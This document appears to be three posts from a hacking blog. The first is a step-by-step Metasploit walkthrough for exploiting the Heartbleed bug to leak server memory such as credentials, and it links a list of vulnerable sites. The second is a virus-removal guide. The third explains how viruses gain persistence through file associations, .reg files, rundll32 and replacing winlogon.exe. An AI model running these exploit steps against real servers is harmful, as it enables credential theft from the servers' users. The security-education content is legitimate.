What is Heartbleed Bug

On April 7, 2014, OpenSSL received a fix to a very popular and controversial vulnerability The Heartbleed bug. On that day, over half a million web servers were found to be vulnerable. Fortunately, that number is steadily decreasing and just like every other exploit, the Heartbleed bug is now out in the wild and the epidemic may never be fully eliminated (A hacker can dream, right?)

This vulnerability allows a hacker to extract information from a server’s memory which may contain authentication credentials, cookies, the server’s private key (even the admin password), and personally identifiable info (PII) that could be used for identity theft. The biggest websites on the internet were vulnerable. Facebook, Google, Twitter, Instagram, Yahoo, Pinterest, Tumblr, Dropbox and a few million more. All these websites were quick to announce, within a few weeks, that they’ve successfully patched the bug. What they didn’t announce, is that this vulnerability existed even 2 years ago and only now came to light. This is also part of the reason users were recommended to change all passwords everywhere. The NSA has (allegedly) been using this vulnerability for years to exploit websites.

Also Read: XSS Attack

OpenSSL is an encryption library used in HTTPS (secure HTTP)

If you ever notice URL bar after typing the address, say “google.com” you’ll see that it automatically changes to “https://www.google.com”. That is the job of OpenSSL. OpenSSL basically encrypts all communication between the server and the client while it takes place through the HTTPS URL. This makes all the password sniffing cookie stealing hacks impossible (sad face).

OpenSSL uses a handshake, or more popularly, a “heartbeat” that echoes back a signal to verify that the data was received correctly, during communication. It’s a bit like double checking whether the message was successfully received or not (Like the two tick marks you can see on WhatsApp messages).

Also Read: Latest Carding Dorks 2017

What is Heartbleed Bug?

The appropriately named Heartbleed bug vulnerability enables a hacker to trick OpenSSL by sending a message that is misinterpreted by the server running OpenSSL. Which then actually sends back the real data without any questions asked. The exact details are a bit technical. But thanks to Metasploit we don’t need to worry about them. Roughly translated, a single byte of data is sent to the server telling it that we actually sent 64K bytes of data. The server will then send back 64K bytes of data to be checked and echoed back.

After this ‘heartbeat’, the server again sends 64K of random data from its memory. That 1 byte has the buggy requests which confuses the server making it give up random information. So, with every ‘heartbeat’ we get 64Kb of private information (That’s enough for ~64,000 characters in plain unencrypted text. A lot of it will be rubbish but still enough for A LOT of accounts and passwords)

Also Read: Metasploit Tools And Cheat Sheet

Now for the Exploit

Here you’ll learn to exploit the Heartbleed bug for getting a buggy website’s OpenSSL to spill the contents of its memory and possibly give us the user’s credentials and other information:

Step 1: This should be the good time to update Metasploit to get the new auxiliary module for Heartbleed. (Unless you downloaded Metasploit after the exploit was released).

Type: kali > msfupdate
Metasploit will then go through the long and slow process of checking and updating its modules and framework. The update has completed and we’re ready to begin, by returning to the command prompt.

Step 2: Start Metasploit
kali > msfconsole

Step 3: Find Heartbleed using the built-in search feature.

Type: search heartbleed
This should bring up two auxiliary modules for Heartbleed. We want the one under ‘scanner’ folder and not ‘server’.

Step 4: Load up the auxiliary module
use auxiliary/scanner/ssl/openssl_heartbleed
This will load the heartbleed module.

Whenever using a new module, you may wish to find more about it and the options we can set for it.
msf > info
This command reveals the options that we can set to use this module and a description of the module.

Step 5: Set RHOSTS. RHOSTS refers to the website that is vulnerable to the Heartbleed bug. We can set it to the IP address of the website as shown below (To find the IP address of a website, simply ping it through the command line (e.g : ping www.google.com) :
msf > set RHOSTS
msf > set verbose true

Finally, set the option “verbose” to “true”. This will give us verbose output (i.e., everything that Metasploit receives from the server will be shown to us).

Step 6: Let her rip.
msf > run

If everything went as planned the server will leak about 64K bytes of what was in its memory. This could contain anything from username-password pairs to credit card numbers which is why this hack (along with pretty much all others) is very much illegal to actually try on a live website without the developer’s explicit consent.

Here is an interesting page listing the names of thousands of vulnerable websites: https://zmap.io/heartbleed/

Also Read: Disable Antivirus In Remote PC

Note:– This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

Hope HACKAGON have provided a healthy knowledge about Heartbleed Bug. So, stay secure and keep learning. If you like this article then don’t forget to share it with your friends and always feel free to drop a comment below, if you have any query or feedback.

Uprooting Virus

A computer virus is a malicious software (also known as “Malware”) that can copy itself and infect other software or files on your computer. If you suspect your computer has been infected, then several antivirus websites provide step-by-step instructions for removing viruses and other malware. So let’s see the procedure of Uprooting Virus.

How to remove and avoid computer viruses?

Fortunately, if you update your computer and use free antivirus software such as AVG, you can help permanently remove unwanted software and prevent installation in the first place.

How do I know if my computer has been infected?

After you open and run an infected program or attachment on your computer, you might not realize that you’ve introduced a virus until you notice something isn’t quite right. Here are a few indicators that your computer might be infected:

  • Your computer runs more slowly than normal.
  • Your computer stops responding or freezes often.
  • Your computer crashes and restarts every few minutes.
  • Your computer restarts on its own and then fails to run normally.
  • Applications on your computer don’t work correctly.
  • Disks or disk drives are inaccessible.
  • You can’t print correctly.
  • You see unusual error messages.
  • You see distorted menus and dialog boxes.

These are common signs of infection — but they might also indicate hardware or software problems that have nothing to do with a virus. Unless you run some kind of Malicious Software Removal Tool and install industry-standard, up-to-date antivirus software on your computer, there is no way to be certain if your computer is infected with a virus or not. Beware of messages warning that you’ve sent in the email that contained a virus. This can indicate that the virus has listed your email address as the sender of the tainted email. This does not necessarily mean you have a virus. Some viruses have the ability to forge email addresses. In addition, there is a category of malware called Rogue Security software that works by causing fake virus alerts to pop up on your computer.

How to install updates and also the antivirus software if you can’t use your computer?

It might be difficult to download tools or update your computer if your computer has a virus. In this case, you can try one of the following options:

  • Use another computer to download the tools to a disk.
  • Get help through your Antivirus’s website support.
  • Have your system checked by a Technician

How can I prevent infection by computer viruses?

Nothing can guarantee the security of your computer, but there’s a lot you can do to help lower the chances that you’ll get a virus.
It’s crucial to keep your antivirus software updated with the latest updates (usually called definition files) that help the tool identify and remove the latest threats. You can continue to improve your computer’s security and decrease the possibility of infection by using a firewall, keeping your computer up to date, maintaining a current antivirus software subscription, and following a few best practices.

Tip: Because no security method is guaranteed, it’s important to back up critical files on a regular basis.

We hope that HACKAGON matched our reader’s expectations about Uprooting Virus. so, if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.

On contrary to popular belief, Hacker’s own machines are often more vulnerable to attacks than the average user. This is especially true of those who are new to the world of hacking because of their more frequent access to remote machines, dodgy forums, open administrative privileges on their own machines and inexperience in covering their tracks etc. Further, those who are experienced often take advantage of the ones who are in the learning stage, trying to get into this field. So, for a newbie hacker, it is of vital importance to learn how to protect themselves to avoid being consumed by their own curiosity by Understanding Computer Viruses.

In this dog-eat-dog world, any kind of safety is an illusion unless proven otherwise.

Understanding Computer Viruses

Understanding Computer Viruses

Computer Viruses are the malware program that, when executed, replicates by inserting copies of itself (possibly modified) into other computer programs, data files, or the boot sector of the hard drive; when this replication succeeds, the affected areas are then said to be “infected”. Viruses are perhaps the oldest form of malicious software (Malware). They’ve been around for a long time and are still evolving and causing havoc all over the world. At first sight, they seem to be innocent looking executable files, but if opened, they can turn your world upside down in a second.

You need a basic arsenal of skills for securing the executables on your system and coping with viruses on your own. Here we discuss proactive methods you can use to defend yourself against malicious executable code in files, resources, component libraries, scripts and macros, as well as how to avoid a handful of other potential vulnerabilities.

Depending on the destructiveness power of the payload, Computer Viruses can result in a significant loss of data, time, and money. In the best scenario, you may just lose the time it takes to disinfect your computer. At worst, a mission-critical server may be reduced to little more than an expensive door-stop. Unfortunately, antivirus software isn’t perfect, and there’s always some lag between the emergence of a new electronic predator and the availability of virus definitions to protect against it. Moreover, many coders of today’s more diverse and sophisticated computer viruses are taking the preemptive step of disabling or even removing antivirus software as part of their operation.

I’m not suggesting that you shouldn’t rely on your antivirus programs for day-to-day virus protection, especially since antivirus programs are very good at keeping you safe but only from the known threats. However, if you’ve never had to fight a virus without your antivirus software, then it’s only a matter of time before you will. The main reason for this is newbie viruses. For an antivirus to be able to guard against newbie viruses, it must first be reported, the virus scanning code must be modified to include this newbie virus, and finally the virus database copy on the client side must be updated.

Because virus protection changes every day, those annoying notifications that your antivirus probably gives routinely are there to protect you. You must’ve noticed in the UPDATE menu of any antivirus an option to “Update Virus Database” or something like that. This is evidence of the ongoing war against viruses.

How do Viruses Works, In General ?

Well, first, the coder writes the executable codes required to carry out the virus’s activation process and then whatever nasty things it’s meant to do. What does the coder want from his virus to accomplish? Should it reformat your hard drive? Delete JPG files? Mail copies of itself to your friends and co-workers? Making any of this happen requires “executable” code of some kind.

Second, in order for this code to execute, the virus needs to be activated or opened. The usual way a virus’s executable code will run is the direct method: some unwary user receives an e-mail attachment called “Click-Here.exe” or something equally enticing. This runs the program and the virus is unleashed. As easily avoided as this result seems to be, it still works far more often than it should.

Virus coders have discovered a number of other, less obvious techniques for getting a virus to take over your computer. Below we take a look at some of these techniques, beginning with the question of what constitutes the executable code, then we’ll examine several sneaky activation methods. These activation methods are particularly important, as this is where you’ll understand how to completely unhook viruses from your system in order to regain control of it following an infection.

What Constitutes Executable Code ?

Of course, you know that .exe files are executable, as are other similar file formats such as .cmd and .com etc. There are many other file types that may contain executable code, and any executable code can be unsafe. In general, executable code falls into three broad categories:

  • Standalone Programs.
  • The code included within resources or libraries.
  • Script or macro code executed by an interpreter of some kind.

In a broad sense, a standalone program is pretty much any file type that relies on the operating system for it to execute. How do you know which ones these are? The answer lies in the Windows registry. To battle against viruses on their own turf, you’ll have to be very comfortable delving into the registry. So let’s take a look at how executable programs are invoked:

  1. Launch the Registry Editor by opening “Run” and type “regedit”.
  2. Expand the “HKEY_CLASSES_ROOT (HKCR)” node – It’s the operating system’s repository for information on file associations and commands and Under this HKCR, you’ll find nodes representing all the file type extensions registered on your computer.
  3. Navigate down the tree until you locate the key named “.exe”.
  4. Select this “.exe” node and observe that its default value (shown in the right-hand pane) is “exefile” – This is a pointer to another node under HKCR (the exefile key).
  5. Scroll down and find the “exefile” folder. The exefile key contains a Shell Subkey. This is where a file type’s available actions are defined. In OS terminology, these actions are known as “Verbs”. For example, a Microsoft Word document might have a “print” verb defined, which allows you to right-click the file in Windows and choose Print from the context menu.
  6. Expand the shell subkey for the “exefile” node to view the available verbs for EXE files. You’ll probably see two or three different subkeys, depending on your system. The one to be concerned with is “open”. (HCKR >> exefile >> shell >> open) Expand this node and select its command subkey. Each verb has its own subkey, and each of those keys, in turn, has its own command subkey. The default value in this subkey dictates exactly what happens when that verb is executed.

Double-clicking the file icon in Explorer has the same effect — it executes the default verb’s command (open for EXE files). As you can see, for EXE files, the open command verb has a value of %1 %* This is used in MS-DOS batch file language. The basic idea is that the path and filename of the EXE file you activated are substituted for the “%1” parameter while any switches or command-line parameters that go along with it are passed through the “%*” parameter. So it would stand to reason that any other file types whose open verb evaluates to some flavor of “%1” would tend to pose a risk. There is a number of these, and they’re all potentially dangerous. Considering that the virus coder knows that most people won’t double-click a file with a .exe extension or a .bat file, there are several other options including : .cmd, .com, .pif, .vbs – All of these file types have a default open verb of %1. A virus writer could simply change the .exe extension of his virus executable to, .com, and s/he probably just increased the chances that the unsuspecting masses will run it. Particularly dangerous is (was, actually) the humble Screen Saver file type (“.scr” extension). Close to the start of the 21st century, “.scr” viruses were literally everywhere. They were widely believed to be power-saving, which is so not true (Stand-by mode is much better). People thought it couldn’t hurt, right? so what’s the harm? So Naive. Again, extension hardly matters, everything a “.exe” virus can do, a “.scr” one can do equally as well. The days of “.scr” might be gone, but viruses are probably here to stay, Whatever the type, extension, purpose and payload – The core concepts are always the same. So, let’s take a deeper look at the working of “.scr” viruses. The key to the future lies in the past between the shadows.

In the Registry Editor, compare the open verb’s command default value for “EXE” and “SCR” files, respectively. As you will notice, they’re pretty much identical— “%1” %* for EXEs and “%1″/s for Screen Saver files. Screen savers are, as it turns out, standalone executables. The only difference between these two default verbs is a “/S” switch for the SCR file type. The intended purpose of the screen saver’s “open” verb is to allow for testing a screen saver, and the screen saver executable interprets the “/S” switch accordingly. There’s nothing to stop a virus writer from giving their application a “.scr” extension and then simply ignoring the “/S” switch passed to it when the user invokes the program. Exploiting the popularity of screen savers was even easier because the caption of the screen saver’s open verb is shown as “Test” in the right-click menu. A user thinks he’s just testing a screen saver, but what he’s actually doing is activating a virus. A particularly clever virus might even display an actual screen saver, pre-occupying you with pretty flowers while it destroys files on your hard drive in the background. This caption is stored in the default value for the open key itself. Meaning, just like you can simply find and change your “Recycle Bin’s” name to say “Dumpster” or “TrashCan”, you can also change the “Test” option to anything you like. On an unrelated note, you may also change the “Open” option for a word document to maybe “Do Belly Dance” or anything you like. Of course, this only changes the string and not what it does.(Try using the “CTRL + F”, find function to poke around and feel the power of “regedit”. Be warned, don’t change anything that you don’t know about. Changing text strings like “My Computer” is harmless, but changing some core functions code may wreck your computer before you can undo it.

Libraries Can Be Dangerous

Executable code can live inside resources or component libraries of many different varieties. These may not seem like obvious candidates for viruses, but they can certainly be exploited in that way. These file types include Dynamic Link Libraries (DLL), Control Panel Applets (CPL), various Type Libraries (TLB, OLB, and so on). This code isn’t directly executable with a “%1” command verb like .exe, but this doesn’t mean that the code can’t be run. Just about any function exported from a DLL can be invoked using a helper application called “RUNDLL32.exe”.

A virus could employ two possible attacks. One would be to replace an existing DLL with a compromised version, in which a particular function is replaced by one of the same name but with altered functionality. Then, whenever the system invokes this function, instead of having the desired result, the virus is activated instead. The second approach is simply to write a DLL from scratch and invoke its functions using RUNDLL32.EXE when needed. This isn’t quite as straightforward as invoking the code in an EXE file, but a DLL, OCX, TLB or another library file is more likely to be accepted by an unsuspecting user or to be overlooked by an antivirus program, so it may well be worth the greater effort on the virus coder’s part.

Scripts and Macros

Increased Flexibility Brings Increased Risk, Script code requires a script engine to interpret and run, but it can still be exploited. Scripts come in several forms, they may be used to perform a repetitive task, modify documents, pretty much everything that a “.exe” file can do. Microsoft has done a lot to tighten the security of these macros and scripts, but it’s still easy for a macro virus to do a lot of damage. A popular script category is Windows Script Host (WSH) files. These files, usually with .wsf, .js, or .vbs extensions, carry a default file association which causes them to be executed, no questions asked when users double-click them. As you might imagine, this can be disastrous.

Web applications may also carry dangerous scripts. Client-side scripts, for example, are fairly limited in their access to the host system for security reasons, but there’s a little-known file type, the HTML Application (with an HTA extension), which works like a client-side Web application without the same security restrictions. Its purpose is to allow developers to use their Web development skills to build rich applications using the Web browser metaphor. But again, the unsuspecting user can unleash all sorts of chaos by downloading and executing such a file without first examining its contents. All of these scripts and macros can be readily examined before they’re executed, but clearly an average user won’t bother reading some weird code.

Virus Activation Methods

The most common way for a virus to be activated is for a user to directly execute, say an e-mail attachment. Virus writers do just about anything to make you open the attachment using this action, but most developers are savvy enough not to just run an unknown executable. Of course, just about all of us have done it at one time or another—particularly now that viruses can access address books and can assemble a credible-looking e-mail message, ostensibly from someone you know and trust. Be that as it may, as users have become more aware, virus creators have gotten more devious, and there is now a host of new methods for activating a virus on a computer that doesn’t require any code to be explicitly executed (E-mail attachment viruses are a rare sight nowadays, since most email services themselves check emails for malicious files).

Registration Files

Files with an REG extension, are system registration files that hold information to be integrated into the system registry. The problem with them is that they carry a default verb of “open”. This means that if any registration file is double-clicked, it immediately dumps its contents directly into the system registry, without any confirmation required (depending on your OS). Since it has access to the registry, it is free to modify anything it pleases. It may delete vital keys required for the system to startup or even modify existing ones to make further file types vulnerable. Also, it may create a new entry for a previously unknown extension. A general antivirus may not recognize and hence ignore a file extension of for example “.bobo”. But in the registry, there could be an entry to make the file’s default action to “Open” or “Run” – giving it all the powers of a .exe file. This could be potentially devastating.

Luckily, most antivirus software nowadays is adopting the “Sandboxing” technique to run untested files. Basically, the antivirus gives the file a test run in a secure and sealed environment (sandbox) and checks if it tries to get out by, for example, trying to access something that it’s not supposed to or changing system settings and variables without asking the users explicitly. Inside the sandbox, it is denied anything remotely suspicious and the antivirus raises a big red flag and moves the file to the quarantine section (virus vault) or maybe even delete it straight away.

Path Vulnerabilities

Another hazard is something called the PATH Environment Variable. Anyone who uses a computer is bound to have used a “shortcut” file at least once. Whether it’s the “Google Chrome” icon on your desktop or maybe “WinZip” in your taskbar these shortcut files are simply links to the actual files stored in the folder in which they were installed. It’s clearly a little tedious to open “My Computer >> C: Drive >> Program Files >> Mozilla”. To open “Mozilla Firefox” every time. Hence, we have these shortcut files which simply stores the “Path” to the actual application. These files don’t exactly use the Path environment variable, but the concept is exactly the same.

The computer has certain files (example: explorer.exe) that it may routinely need to open (example: at startup). So, in the Registry, it has simply stored the name of the file it needs to open, and it’s path (in a path variable). Whenever the OS needs to open a particular system file it simply looks it up in the registry, follows the path in the memory and opens it. What does this have to do with viruses? With everything from phones to cars to houses getting smarter every moment, our computer viruses are not behind. It’s just a little too obvious and literally “on the nose” when a user clicks a file and his computer goes berserk. Once infected, our victim, although compromised is now a little wiser for he knows exactly where it went wrong. If the victim downloaded something from a website that caused damage to his system, s/he may report the website to the police. Clearly jail time is not so appealing to anyone, let alone virus programmers.

This brings us back to path vulnerabilities. Get this! The attacker needs to infect a system without making it too obvious. To do so, s/he needs a time gap between the actual infection and the attack so that it hits the victim out of the blue. We have two ways to do this by exploiting the path variable. Average users don’t really bother to sniff around system files like in the “Windows” folder (you may find this in your C: drive) and this much understandable carelessness can be exploited. The attacker can simply take two systems, one with Windows 7 and the other with XP and search for the location of (example) “winlogon.exe” – A file that is used by the OS to maintain a user session. (You may find this running in the task manager). Now in the virus file, the attacker can simply write up code to create two copies of the virus and send one to the path for Windows 7, and the other one to the path for Windows XP. (The path for the “winlogon.exe” file, which s/he searched earlier). After this, the virus can be coded to delete the file “winlogon.exe” and simply rename itself “winlogon.exe”. So, on the next startup when the OS looks up this file, it instead unleashes the virus and we’ve got BOOM. Total stealth, total annihilation and the victim have got no clue of what the hell just happened. The other way to do this is to code the virus to edit the path in the registry from its default value to where it (the virus) is stored. It can then rename itself and in this case on the next startup, the OS doesn’t even go to the actual file but instead to the virus and starts it up. Equally effective.

The Best Offense is a Strong Defense Understanding how viruses take hold is the first step in knowing how and where to untangle them from your system once it has been compromised. As viruses become more sophisticated, you can expect them to become more aggressive toward your antivirus software. So what can we do about these nefarious little beasties? We’ve come a long way. Even though the end is not in sight, the roads that lie ahead of us are shorter than the ones behind. Cyber Security today, is tighter than ever but that doesn’t mean we are immune to attacks. If you do have the latest antivirus software and keep your OS updated, you probably don’t need to worry about 99% of all the malicious software out there, but the remaining 1% is the reason why cyber security is a $100 billion market today. Successful attacks are rarer today than ten years ago, but they certainly make up for it in sheer intensity. More and more people each day are relying more and more on their computers, not knowing that simply entering their credit card information on a secure website could be sending all those details to a hacker. Attacks and infections are decreasing in number, but rising in destructiveness. Today, almost nobody bothers to spread around a virus that simply causes reboots or wipes data, since there’s no real gain for the hacker in it. The malicious software today are much more targeted. Clearly, obtaining someone’s social security number or bank pin is much more valuable to a hacker than deleting some random person’s movies and pictures.

The only thing we can do is keep our eyes open and turn around at the slightest hint of trouble. Avoid downloading from unconfirmed sources and make sure your antivirus software and OS is updated. Even if your system is compromised you may never actually know it, but the hacker could have identified that you are an easy target. If just once he could get valuable information from your system, it’s very likely that he will keep the system compromised, silently (make it a slave). Further, make sure to never ever store sensitive or financial information on your computer. Keeping it on an offline system or an external hard drive is much safer.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

We hope that HACKAGON matched our readers expectations regarding Virology – Understanding Computer Viruses. so, if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.